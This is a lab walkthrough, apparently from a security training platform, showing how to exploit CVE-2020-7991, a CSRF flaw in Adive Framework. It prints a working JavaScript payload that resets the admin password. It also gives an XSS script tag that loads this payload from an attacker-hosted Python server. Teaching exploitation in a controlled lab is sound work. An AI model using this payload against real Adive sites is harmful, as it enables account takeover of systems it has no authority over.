[CVE-2020–7991] CSRF in Adive Framework
CVE-2020–7991 is a CSRF issue in the Adive Framework version 2.0.8 and lower. This vulnerability allows an attacker to change the administrator’s password.
Adive Framework is a free and open-source application written in PHP.
Lab Scenario
We have set up the below scenario in our Attack-Defense labs for our students to practice. The screenshots have been taken from our online lab environment.
Lab: Vulnerable Advice Framework Instance
This lab comprises a Kali machine (192.149.43.2) and a Web server (192.149.43.3 or target-1). The user or practitioner will get a graphical user interface (GUI) access to the Kali machine, through the web browser.
Challenge Statement
The following username and passwords may be used to explore the application and/or find a vulnerability which might require authenticated access:
- Username: admin
- Password: admin
Objective: Exploit the vulnerability and take over the admin account of the target.
Solution
Step 1: Check the IP address of the host machine.
Step 2: Perform a Nmap scan for the target machine.
The Apache web server is running on port 80 of the target machine.
Step 3: Open the web application in the browser.
Step 4: Search “CVE-2020–7991 exploit-db” on google.
Check the Exploit-DB link. The entry contains the script that can be used to exploit the vulnerability.
Exploit DB Link: https://www.exploit-db.com/exploits/47966
Step 5: Navigate to the admin login by clicking on the Dashboard.
Step 6: The user has to authenticate in order to exploit the vulnerability. Use the credentials provided in the challenge statement.
Credentials:
- Username: admin
- Password: admin
URL: http://vt3sq72fu6tyxbjq4n7b3ptyh.stager3.attackdefenselabs.com/
Admin Dashboard
Step 7: Copy the javascript payload and modify the URL (with the URL of your lab).
function execute(){var nuri =”http://192.149.43.3/admin/config";xhttp = new XMLHttpRequest();xhttp.open(“POST”, nuri, true);xhttp.setRequestHeader(“Content-type”, “application/x-www-form-urlencoded”);xhttp.withCredentials = “true”;var body = “”;body += “\r\n\r\n”;body +=“userName=Administrator&confPermissions=1&pass=hacked@123&cpass=hacked@123&invokeType=web”;xhttp.send(body);return true;}execute();
Save the exploit as “exploit.js”.
Step 8: Start a python HTTP server on port 80
Command: python3 -m http.server 80
Step 9: Navigate to the configuration section by clicking on the Configuration Button.
Click on ‘MANAGE DASHBOARD USERS’ button.
Step 10: Click on the Create new user button.
Step 11: Modify the URL in XSS payload provided at exploit-db. And inject the payload in ‘Name’ text field as well as fill any other required fields.
Payload: <script src=”http://192.149.43.2/exploit.js"></script>
Click on the ‘CREATE USER’ button.
Step 12: Check the python server.
The exploit.js has been triggered successfully and the password of user admin has been changed to hacked@123.
Step 13: Logout and login again with the new credentials to verify the exploitation.
The credentials have been successfully modified by exploiting the CSRF vulnerability.